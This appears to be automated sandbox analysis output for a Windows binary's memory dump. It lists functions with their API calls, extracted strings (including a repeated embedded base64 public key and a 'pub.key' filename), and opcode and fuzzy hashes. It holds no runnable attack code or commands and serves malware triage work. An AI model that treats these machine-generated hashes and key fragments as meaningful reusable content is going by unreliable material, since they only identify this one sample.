MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 013DA2A9, 013DA666

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
API String ID: 73155330-3729741635
Opcode ID: f0ecf15b8e534febf8c6a4f3115b2dad4efcb9707ff577b48eaef34247ea9d9f
Instruction ID: c218b5f71d8eed9088462b25514cc8cd9de13a9084f72e1a68861b152ee6435c
Opcode Fuzzy Hash: f0ecf15b8e534febf8c6a4f3115b2dad4efcb9707ff577b48eaef34247ea9d9f
Instruction Fuzzy Hash: 2E31F26331265595DE04DF6BE6542AC3261A744FF8F5807258F3E07BD0DEB8C4928304

Uniqueness

Uniqueness Score: -1.00%

Function 013DDFF0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 013DE145
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DE14B

Strings

MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 013DDFF4

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
API String ID: 73155330-3729741635
Opcode ID: 0b66cfe51704e4ae89d37a42aa5e80a22c3ca7fc0a54e5bd8a14e116dd64169c
Instruction ID: eef0bba8d393ff307ee2f666990d06f4a6b1835b861fc753f3f90638cc0840d0
Opcode Fuzzy Hash: 0b66cfe51704e4ae89d37a42aa5e80a22c3ca7fc0a54e5bd8a14e116dd64169c
Instruction Fuzzy Hash: EA31DE2230178495EE149F2AE9442996A56A718BE8F880735DFBD0BBD4DE78D0A1C300

Uniqueness

Uniqueness Score: -1.00%

Function 013DA660, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DA7AA
Concurrency::cancel_current_task.LIBCPMT ref: 013DA7B6

Strings

MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 013DA2A9, 013DA666

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
API String ID: 73155330-3729741635
Opcode ID: 188d0734c68b46fc6cf03b8a4b8c44ce71a1baedb82c1c3dec520b67d9fff496
Instruction ID: abe8cc7c87cbeb6b3278d46d29ddd814809c9689657f69ff19cb8ee323142eeb
Opcode Fuzzy Hash: 188d0734c68b46fc6cf03b8a4b8c44ce71a1baedb82c1c3dec520b67d9fff496
Instruction Fuzzy Hash: 2031276331269448EE19DB6AA7543683265A754FF8F590721CF7E07BD8EE78C4C28344

Uniqueness

Uniqueness Score: -1.00%

Function 013B3520, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013B3603

Part of subcall function 01440748: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0141FC06), ref: 0144078C
Part of subcall function 01440748: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0141FC06), ref: 014407D2

Strings

0 @, xrefs: 013B35D9
ios_base::badbit set, xrefs: 013B3640

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFileHeaderRaise_invalid_parameter_noinfo_noreturn
String ID: 0 @$ios_base::badbit set
API String ID: 38560573-2270638013
Opcode ID: a54d2e76727e2fa9ad614ab919f6b44450d79ea9dcd567706e42d578513be7a1
Instruction ID: 9ab238772d1e8588e547888661fd9d1c54dd2b70b98ad49a50738355e50a5c43
Opcode Fuzzy Hash: a54d2e76727e2fa9ad614ab919f6b44450d79ea9dcd567706e42d578513be7a1
Instruction Fuzzy Hash: C331D432215B8492EB10DB29E8803EE7761F795BA8F54532ADBAD03FA4EF78C545C700

Uniqueness

Uniqueness Score: -1.00%

Function 0145E3B4, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0145E4CB
GetLastError.KERNEL32 ref: 0145E4ED

Strings

U, xrefs: 0145E477

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 0a4b54cf404689801f8ce3bbdef82a359645ebe09c075bdf75b61631308909a7
Instruction ID: af5e6128b741549dbf988fec3ef3a80faafc35400e6c7e8f931e8b489f19db7c
Opcode Fuzzy Hash: 0a4b54cf404689801f8ce3bbdef82a359645ebe09c075bdf75b61631308909a7
Instruction Fuzzy Hash: EE31C072724A8082DB60CF65E8447AABBA1F798BD4F854026EE8D97768EB3CC541C740

Uniqueness

Uniqueness Score: -1.00%

Function 013DF4C0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DF5E7
Concurrency::cancel_current_task.LIBCPMT ref: 013DF5ED

Strings

\Cpub.key, xrefs: 013DF4CC

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: \Cpub.key
API String ID: 73155330-3023347968
Opcode ID: fcbad708078ade19cad062641494360f8c82d8be81404a474620821477f55b44
Instruction ID: 43daf2bd27edb80de99ea5bd88ce2aa4bdefcb4d7ff95082fe7c9a4f7e156d3a
Opcode Fuzzy Hash: fcbad708078ade19cad062641494360f8c82d8be81404a474620821477f55b44
Instruction Fuzzy Hash: 68219E6330178494DE28DF16B5402A962AAE75CBF8F880B359F7E877E4DE78D092C300

Uniqueness

Uniqueness Score: -1.00%

Function 01453204, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 01453291
_invalid_parameter_noinfo.LIBCMT ref: 014532EB

Strings

MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 01453217

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
API String ID: 3215553584-3729741635
Opcode ID: 17eac1953acfe6f0d9f3b1f1bcf075f1bf6f858a32a4fdcd5392260a06d28a80
Instruction ID: c66cc39789061212de51e1f68f93d80baf9c9f0ce226b0191a0fdbd89784e7ae
Opcode Fuzzy Hash: 17eac1953acfe6f0d9f3b1f1bcf075f1bf6f858a32a4fdcd5392260a06d28a80
Instruction Fuzzy Hash: 8031B672204B8182DBA29F5A954022EA660FB55BF0F548717EFA907BFBDB39C452C701

Uniqueness

Uniqueness Score: -1.00%

Function 013E52C0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 013E53BD

Strings

Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 013E5323
Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 013E5356

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __std_exception_copy
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 592178966-3345525433
Opcode ID: 545d651cab0fc8799bdc0196a56b76e25d35cb4df78cc40434bf2357861f65f4
Instruction ID: c499676b34e3b5b5c1a70f9d6d51302878c46830d8b4bfe0985df5f4efb59566
Opcode Fuzzy Hash: 545d651cab0fc8799bdc0196a56b76e25d35cb4df78cc40434bf2357861f65f4
Instruction Fuzzy Hash: 74318F76214B4692EE10EF29E8903996361FBA478CF905122DB8C47678EF38C559C740

Uniqueness

Uniqueness Score: -1.00%

Function 01448440, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 014484A7

Strings

%lf, xrefs: 014484DC

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameName::
String ID: %lf
API String ID: 1333004437-2891890143
Opcode ID: 3d3714361489114c4e255e73ae5f9a804c433d1c45d01b0de05eae25e32e508b
Instruction ID: 21a90b1e7637d8bd0b4f9f0c9a7bd28a1bda0aa75a443c284a5ee38f6b2f56cf
Opcode Fuzzy Hash: 3d3714361489114c4e255e73ae5f9a804c433d1c45d01b0de05eae25e32e508b
Instruction Fuzzy Hash: 0B218F72614B9586EB21CF65F85039A77A4F399BC4F988126DA8D47729DF3CC142CB80

Uniqueness

Uniqueness Score: -1.00%

Function 014478E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 014479DE

Strings

void , xrefs: 01447968
void, xrefs: 01447940

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: d6e81a20369096e9353ef70f6ff02494e03f1873ed16edb0103d1197211cf3d8
Instruction ID: c79d78ac2a2284a78133c11919348f566d72724a071206ff10547de14728eb6a
Opcode Fuzzy Hash: d6e81a20369096e9353ef70f6ff02494e03f1873ed16edb0103d1197211cf3d8
Instruction Fuzzy Hash: 04314876A14B249EFB11CFA4E8403ED37B0F758748F98452ADF4A67B28DB388156C790

Uniqueness

Uniqueness Score: -1.00%

Function 0141F7F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SimpleString::operator=.MSOBJ140-MSVCRT ref: 0141F839

Part of subcall function 013B1DE0: __std_exception_copy.LIBVCRUNTIME ref: 013B1F3F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0141F8C0

Strings

0 @, xrefs: 0141F897

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: SimpleString::operator=__std_exception_copy_invalid_parameter_noinfo_noreturn
String ID: 0 @
API String ID: 675954111-947018160
Opcode ID: db907e382f8969a60eccec2eab5fff1ccf7cf2f085b4884f548a97a043dee076
Instruction ID: ea945d3a32f1402728e494c976662faf913b44a51d82fa97036d7b87df4b470f
Opcode Fuzzy Hash: db907e382f8969a60eccec2eab5fff1ccf7cf2f085b4884f548a97a043dee076
Instruction Fuzzy Hash: E3118132B10B6488FB109BB5E8417AD6370B758BD8F544616DF6C67FA8DB788586C300

Uniqueness

Uniqueness Score: -1.00%

Function 0145D210, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0145D249
CompareStringW.KERNEL32 ref: 0145D2D1

Strings

CompareStringEx, xrefs: 0145D23D

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CompareStringtry_get_function
String ID: CompareStringEx
API String ID: 3328479835-2590796910
Opcode ID: 6c0466564a66ca221cf4b04505241aa10845bcf7c9b817c22eaa6ca15dc4c9af
Instruction ID: fdcc7bca0a3b8a74e6b0fd4950f1a97938b64ed3630cbf123f8768dc88a03765
Opcode Fuzzy Hash: 6c0466564a66ca221cf4b04505241aa10845bcf7c9b817c22eaa6ca15dc4c9af
Instruction Fuzzy Hash: 54111436608BC086D760DB56F48039AB7A4F7D9B94F54412AEE8E83B69CF38C4458B40

Uniqueness

Uniqueness Score: -1.00%

Function 0145D70C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0145D745
LCMapStringW.KERNEL32 ref: 0145D7CD

Strings

LCMapStringEx, xrefs: 0145D739

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 1da6172cdc2b8c67667210ebf8bed3b4e0c7078478a9e26ef69e8fc957c332aa
Instruction ID: 595b42893eb06e1cd9bfb863338f2508fabdca5c0b46285865f10b3d81b1b390
Opcode Fuzzy Hash: 1da6172cdc2b8c67667210ebf8bed3b4e0c7078478a9e26ef69e8fc957c332aa
Instruction Fuzzy Hash: 95112636608BC08AD760DB56F48039AB7A5F7D9B94F54412AEECD83B29CF38C4448B40

Uniqueness

Uniqueness Score: -1.00%

Function 013B4220, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 01440748: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0141FC06), ref: 0144078C
Part of subcall function 01440748: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0141FC06), ref: 014407D2

__std_exception_copy.LIBVCRUNTIME ref: 013B428D

Strings

Clone() is not implemented yet., xrefs: 013B4227
:@, xrefs: 013B42B1

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFileHeaderRaise__std_exception_copy
String ID: :@$Clone() is not implemented yet.
API String ID: 3973727643-2956181138
Opcode ID: 6223fceee3d91d16205e0b91a11a9b834782e177b2774bec7416d8f7ee2f2deb
Instruction ID: 3d33868cbac3fd7594b06c16fe7cec3447bb2a8efd225ed9f5dc562f7f1f6587
Opcode Fuzzy Hash: 6223fceee3d91d16205e0b91a11a9b834782e177b2774bec7416d8f7ee2f2deb
Instruction Fuzzy Hash: 7A115E72615B41A6DB00DF55E9803897375FBA8784FA09122D79C47778EF38C6A9C740

Uniqueness

Uniqueness Score: -1.00%

Function 01440748, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0141FC06), ref: 0144078C
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,0141FC06), ref: 014407D2

Strings

csm, xrefs: 014407BF

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: a3358302b552b04846b80d1d19cc2061a4c34451c5ba789117a750293c98cf24
Instruction ID: 7735c2e0ba6b4c4fd326c926f3c4ffa94c8d77a522e21bda0cb4538722fa24f0
Opcode Fuzzy Hash: a3358302b552b04846b80d1d19cc2061a4c34451c5ba789117a750293c98cf24
Instruction Fuzzy Hash: E311FE36619B8482EB218F15F54039A7BA5FB88B98F584225EFCD07769DF3CC565CB00

Uniqueness

Uniqueness Score: -1.00%

Function 013B40C0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 013B40ED

Strings

`@@, xrefs: 013B411B
:@, xrefs: 013B4111

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __std_exception_copy
String ID: :@$`@@
API String ID: 592178966-1323395004
Opcode ID: 28eadf7e5e01b2920f36e8d9dc2a7d6673c50026684ebb4af936369be35d4dfd
Instruction ID: d4cfc90d433824e711374251d846d66bc09c68fd2631deca405ea7bd6127fef8
Opcode Fuzzy Hash: 28eadf7e5e01b2920f36e8d9dc2a7d6673c50026684ebb4af936369be35d4dfd
Instruction Fuzzy Hash: 1E014472606F40E6CB008F25EA8028873B8FB68B84F509222CB9C83734EF34D5B4C380

Uniqueness

Uniqueness Score: -1.00%

Function 0145D57C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0145D5A5
GetUserDefaultLCID.KERNEL32(?,?,000000A0,0146861C), ref: 0145D5BC

Strings

GetUserDefaultLocaleName, xrefs: 0145D588, 0145D592

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DefaultUsertry_get_function
String ID: GetUserDefaultLocaleName
API String ID: 3217810228-151340334
Opcode ID: 9fdc3b2111a23012c4160a4eae8985d1c547e798e987b5881dcbd940133c954e
Instruction ID: 5e87e067a05ccb75f873909d48f855ed8858b8904eea40d1130ec3b1c194660d
Opcode Fuzzy Hash: 9fdc3b2111a23012c4160a4eae8985d1c547e798e987b5881dcbd940133c954e
Instruction Fuzzy Hash: D5F0A030B1464092EB546BA6F5947E922A1BF987C8F84502A8E0E47B75CF38C4498300

Uniqueness

Uniqueness Score: -1.00%

Function 0145D45C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0145D485
TlsSetValue.KERNEL32(?,?,8000000000000000,0145CD2E,?,?,8000000000000000,014522F9,?,?,?,?,0145CE9D), ref: 0145D49C

Strings

FlsSetValue, xrefs: 0145D472

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 827c86f50b32f4490610fd390af937edd2506365aa824ad70b5aab6cf02dcaf8
Instruction ID: 610810769e9322de8779a55f6c4996856aeeaa8902fca1c83d7936fc3a119bb6
Opcode Fuzzy Hash: 827c86f50b32f4490610fd390af937edd2506365aa824ad70b5aab6cf02dcaf8
Instruction Fuzzy Hash: 2BE0D87661464092FB446B91F4503D92722EF88790F585037DE1907375CF38C489C300

